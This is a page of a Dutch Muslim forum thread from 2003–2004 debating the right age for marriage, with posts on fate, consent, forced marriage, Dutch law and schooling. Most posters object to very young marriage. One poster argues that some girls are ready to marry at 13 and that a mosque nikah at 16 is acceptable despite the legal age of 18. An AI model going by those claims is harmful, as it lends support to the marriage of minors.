Lid geworden: 12 oktober 2003
Locatie: Morocco
Online status: Offline
Berichten: 37
Plaatsingsopties Plaatsingsopties   Quote moslima_14 Quote  Post ReplyReageer Directe link naar dit bericht Geplaatst op: 23 januari 2004 om 11:32

Asalaamoe alaikum war�hmatoellah

Of je er klaar voor bent of niet dat je op je 16 of 18 of 20 of 25 jarige leeftijd trouwt je moet geloven in al qardr(het lot) misschien heeft Allah sub Ghana la WA tahallah helemaal geen partner voor die gene die er klaar voor zijn om te trouwen dit wou ik ff mededelen niemand en dan ook niemand weet wat voor leven Allah sub Ghana la WA tahallah ons heeft gegeven

 

Wailikum asalaam war�hmatoellah jullie zuster in islam najiha

Terug naar boven
marhaba Bekijk dropdown
Senior Member
Senior Member
Avatar

Lid geworden: 22 december 2003
Locatie: Belgium
Online status: Offline
Berichten: 634
Plaatsingsopties Plaatsingsopties   Quote marhaba Quote  Post ReplyReageer Directe link naar dit bericht Geplaatst op: 24 januari 2004 om 14:07

salaam

oeghti moslima,ge hebt zeker gelijk,zonder enige twijfel!!

maar u moet u realisere dat uithuwelijken bestaat er helaas ng altijd bij somige culturen, en uithuwelijken is iets wat uw omgeving vr u kiest en aan u plichten etc etc ....

wat ik wil zeggen,huwelijk is een verantwoordelijkheid ,een beslissing van de 2 partners zelf,(en ja met de ouders hun  akkoord)  

en dan nog, huwelijken is vanaf uw 18 de toegestaan, jij bent dan volwassen,bewust van de meeste dingen die er in deze wereld gebeuren..................

wa llahou a3lam.

groetjes, meriem.

allahou akbar, thabitna ya rabi fi hada dien, wa rfa3na yarabbi fi 3illiyin, wa h 'shourna ya rabbi fi lkawmi nadjiin, ya allah, ya mawlana!soubhaanak .
bezoek ook: www.moslim.net
Terug naar boven
cool Bekijk dropdown
Newbie
Newbie
Avatar

Lid geworden: 10 januari 2004
Locatie: Belgium
Online status: Offline
Berichten: 8
Plaatsingsopties Plaatsingsopties   Quote cool Quote  Post ReplyReageer Directe link naar dit bericht Geplaatst op: 24 januari 2004 om 14:31

SALAAM  ALLEMAAAL

OP 13 JARIGE LEEFTIJD IS GEWOONWEG VERKEERD:

BESLAMA

Terug naar boven
Nourdiene Bekijk dropdown
Groupie
Groupie
Avatar

Lid geworden: 20 januari 2004
Locatie: Nederland
Online status: Offline
Berichten: 136
Plaatsingsopties Plaatsingsopties   Quote Nourdiene Quote  Post ReplyReageer Directe link naar dit bericht Geplaatst op: 24 januari 2004 om 17:31

Wassalamoe alaykoem,

Weet je wat ik me afvraag????   Wie zijn nou de mannen die z'n  jong (bruidje) trouwen, en wat zijn hun verwachtingen van z'n huwelijk???        

Behalve dat we ons op een individu van een jonge leeftijd, volwassen of niet concentreren. lijkt mij het veel interesanter om je op de bruidegom in kwestie te consentreren.         ; ;

Zolang er geen vraag is, Hoeft er ook geen aanbod te zijn denk ik dan.  Ik weet het niet hoor ik vindt het echt moeilijk om mezelf in z'n aanstaande bruidegom te verplaatsen, en denk daarbij ook dat iedereen zo zijn eigen criteria hanteerd.      Ik weet wel dat een moslim wordt aangemoedigd op jonge leeftijd te trouwen, Dit is alleen mogelijk als ze op juiste basis worden gesloten. Een aantal voorwaarden en aanbevelingen voor succes ziijn dan ook: 

  • Volledige wederzijdse instemming van de man en de vrouw
  • Een gemeenschappelijk concept  van leven, levensstijl en gemeenschappelijke manieren om problemen te overwinnen is nodig.
  • De man en de vrouw moetten voldoende informatie hebben over elkaars kennis en praktizeren van de islam, en ook dat ze elkaar van te voren zien.
  • De man-vrouw relatie moet, als hij kans van slagen wil hebben, gebaseerd zijn op wederzijds respect, begrip,samenwerking, liefde en genade.
  • Geen van beide partijen mogen van voornemens zijn om een tijdelijk huwelijk aan te gaan. De islam erkent alleen de intentie om een blijvend huwelijk te sluiten.

De stelling is dan ook buiten het lichaamelijk aspect van volwassenheid, hoe oud moet je ongeveer in jaren zijn om geestelijk een aantal van deze punten goed te begrijpen en op basis daarvan te besluiten. Het antwoord zal voor een ieder zijn.

Verder is het niet onbelangrijk om je vertrouwen in god te leggen. Allah (swt) die beslist of we uberhaupt trouwen en zo ja met wie.    Ik ben zelf 22 maar wat mij betreft wel oud genoeg om met de hulp van Allah (swt) hier insahlah op korte termijn een besluit over te neemen. (voor sommigen zal dit misschien jong zijn voor andere te oud)

Moge Allah (swt) ons genadig zijn in de toekomst, en mij mijn broeders en zusters insalah leiden in onze keuzes.      uiteindelijk (trouwen) we (allemaal) met wie Allah (swt) voor ons heeft bestemt.   Khair insalah Khair.

Wa 3laykoem assalam wa rahmatoe lah wa barakatoehoe                                      

"Onze Heer, wij geloven in wat Uneergezonden hebt en wij vlogen de Boodschapper en schrijf ons daarom op bij de getuigen (van de Eenheid van Allah)." (Soerah �li-'Imr�n aya 53)
Terug naar boven
marhaba Bekijk dropdown
Senior Member
Senior Member
Avatar

Lid geworden: 22 december 2003
Locatie: Belgium
Online status: Offline
Berichten: 634
Plaatsingsopties Plaatsingsopties   Quote marhaba Quote  Post ReplyReageer Directe link naar dit bericht Geplaatst op: 25 januari 2004 om 00:25

SALAAM

you re just sooo right!!!!!

w.a.w.a.w.b

allahou akbar, thabitna ya rabi fi hada dien, wa rfa3na yarabbi fi 3illiyin, wa h 'shourna ya rabbi fi lkawmi nadjiin, ya allah, ya mawlana!soubhaanak .
bezoek ook: www.moslim.net
Terug naar boven
Khadijah Bekijk dropdown
Newbie
Newbie
Avatar

Lid geworden: 22 augustus 2004
Locatie: Nederland
Online status: Offline
Berichten: 18
Plaatsingsopties Plaatsingsopties   Quote Khadijah Quote  Post ReplyReageer Directe link naar dit bericht Geplaatst op: 13 oktober 2004 om 05:20

Salaam aleikum.

Nourdienne, je hebt helemaal gelijk.

Ik denk dat er best een klein aantal meisjes klaar is om op 13,14 jarige leeftijd te trouwen. Maar welke man is daar toe bereid. Een man die in alle oprechtheid en met taqwa met haar in het huwelijk wil treden zul je niet snel vinden. Dus ook al zou een meisje op die leeftijd er klaar voor zijn, dan moet ze nog een man kunnen vinden die bereid is met haar te trouwen.  Ik geloof best dat je op 13jarige leeftijd klaar kunt zijn hiervoor, maar dit is eerder uitzondering dan regel, dus waar maken we ons met zijn allen druk over. Over die 4 � 5 meisjes!!!

Ik was 21 toen ik trouwde, maar ik was er al veel eerder klaar voor. Pas toen ik bekeerd was tot de Islam bracht Allah swt een goede man op mijn pad die met me wilde trouwen. Dus alles gaat uiteindelijk toch hoe Allah swt wil en niet hoe wij willen.

Terug naar boven
Vincent Bekijk dropdown
Groupie
Groupie


Lid geworden: 27 november 2003
Locatie: Netherlands
Online status: Offline
Berichten: 285
Plaatsingsopties Plaatsingsopties   Quote Vincent Quote  Post ReplyReageer Directe link naar dit bericht Geplaatst op: 13 oktober 2004 om 05:53
Mag ik er nog op wijzen, dat in Nederland een wettelijke minimumleeftijd voor trouwen geldt van 18 jaar. Jonger (maar minimaal 16 jaar) kan, maar alleen als de vrouw een kind heeft of zwanger is.
Groet,
Vincent
Terug naar boven
Khadijah Bekijk dropdown
Newbie
Newbie
Avatar

Lid geworden: 22 augustus 2004
Locatie: Nederland
Online status: Offline
Berichten: 18
Plaatsingsopties Plaatsingsopties   Quote Khadijah Quote  Post ReplyReageer Directe link naar dit bericht Geplaatst op: 13 oktober 2004 om 06:18

Salaam aleikum,

18 is de wettige leeftijd dat je mag trouwen, maar in de moskee niet hoor. Nikaah mag best als je 16 bent. heb geboeg voorbeelden in mijn omgeving.

Terug naar boven
Noor al-Islaam Bekijk dropdown
Senior Member
Senior Member


Lid geworden: 14 juli 2004
Locatie: Nederland
Online status: Offline
Berichten: 955
Plaatsingsopties Plaatsingsopties   Quote Noor al-Islaam Quote  Post ReplyReageer Directe link naar dit bericht Geplaatst op: 13 oktober 2004 om 07:17

Salam Aleikum,

zelf vind ik 16 wel jong, en ik ken genoeg mensen die zo jong getrouwd zijn, en ken ook een vrouw, die trouwde toen ze 13 was.

Het is nog een kind, dat met poppen speelt, dat nog alle aandacht wil van haar ouders, zo'n meisje is daar nog lang niet klaar voor.

En ik vind dat we Aicha niet moeten gaan vergelijken met de 'normale' mens, want zij was anders en Allah heeft het zo gedaan dat het wel kon, zij was de uitverkorene om de Islaam voort te zetten na de dood van Mohammed vzmh.

Ik ben 17 en kan niet zeggen of ik nu wil trouwen of niet (dan moer er wel iemand zijn  natuurlijk) .

W8 af wat Allah mij incha'allah zal brengen, je kunt wel gaan planne enzo, maar als het bij Allah al bekend is, niemand die er wat aan zal doen, wees geduldig en w8 af!

Salam Aleikum

Terug naar boven
Moslima_Roos Bekijk dropdown
Newbie
Newbie
Avatar

Lid geworden: 18 november 2004
Locatie: Nederland
Online status: Offline
Berichten: 30
Plaatsingsopties Plaatsingsopties   Quote Moslima_Roos Quote  Post ReplyReageer Directe link naar dit bericht Geplaatst op: 19 november 2004 om 05:29
Assalaamoe aleykoem lieve zusters,

Allereerst vraag ik me af waarom er hier zo 'gekibbeld' wordt. Kijk, wat Allaah toen in de Koran voor ons heeft bepaald, geldt vandaag de dag nog, ook al zijn de meisjes van nu 'wetenschappelijk gezien' minder snel volwassen. Ik vertrouw eerder op de Koran, dan wat door kuffaars(als zij die onderzoek hebben verricht) voor ons neus zetten.

Ikzelf ben zestien en denk zelf ook dat ik er klaar voor ben om te trouwen. Maar in de pratijk hoeft het niet zo te zijn. Ik weet dat Allaah, subhanna wa ta'la, ons verzoekt om jong te trouwen en als we er geestelijk en lichamelijk ervoor klaar zijn. Het probleem is alleen, hoe ik mijn studie kan gaan combineren met het huwelijk, want vroeger was het niet zo dat vrouwen naar school gingen en studeerden.
 Kan iemand van jullie een meisje, dat studeert/nog naar school gaat, aanraden huisvrouw en echtgenote te zijn? Wie gaat overdag zorgen voor het huishouden? Wat als ze dan in verwachting raakt? Het is dan nog moeilijk, om een (dan) 17-jarige zwangere meisje op school toe te laten....toch?

 Ik wil hiermee alleen zeggen, dat ondanks dat wij graag Allaah's verzoeken willen inwilligen, we toch door de huidige samenleving moeilijk is om het in pratijk te brengen. Vandaar misschien dat de meisjes nu langer wachten met trouwen, totdat ze hun studies hebben afgerond. Ik weet, mijn geloof is belangrijker dan mijn studie, maar ook in ons geloof staat dat we naar kennis op zoek moeten gaan. De Islaam is zeker niet tegen op intellectuele vrouwen in de gemeenschap.

Is het daarom niet redelijk om die ene paar jaartje later te trouwen? Wij weten, dat als we het uitstellen, we het alleen maar een beetje moeilijker voor onszelf maken(door de verleidingen die je constant moet weerstaan).

Verder wil ik duidelijk maken dat ik hier geen mening vooruit breng, maar meer mijn visie op dit zaak weergeef.

Ik hoop dat ik geen verkeerde dingen heb gezegd en Allah weet het beste..

Wa aleykoemoe salaam

en Allah weet het beste...
Terug naar boven
Noor al-Islaam Bekijk dropdown
Senior Member
Senior Member


Lid geworden: 14 juli 2004
Locatie: Nederland
Online status: Offline
Berichten: 955
Plaatsingsopties Plaatsingsopties   Quote Noor al-Islaam Quote  Post ReplyReageer Directe link naar dit bericht Geplaatst op: 19 november 2004 om 06:04

Salam Aleikum,

Macha Allah oegty, zelf ben ik 17 en zoals jij zegt, ik heb zelf het gevoel dat ik er klaar voor ben. En als je echt ergens voor gaat, met de hulp van Allah komt het allemaal goed. Zelf zit ik ook op school, dus je krijgt steeds te horen, nee je bent te jong, nadat je je school afhebt en ga zo maar door. Ik denk zelf als Allah wilt dat ik nu trouw, dan trouw ik. En dan dat ik naar school moet, die kan ik nog steeds af maken zonder enige problemen, het belangrijkste is dat je er samen voor gaat, jij en je echtgenoot. heb volle vertrouwen in jezelf en vooral in Allah, en het komt goed incha Allah.

Wie weet wat Allah ons brengt....

ma3a salama

Terug naar boven
 Post Reply Post Reply Pagina  <123>

Spring naar forum Forum rechten Bekijk dropdown



Deze pagina is gemaakt in 0.093 seconden.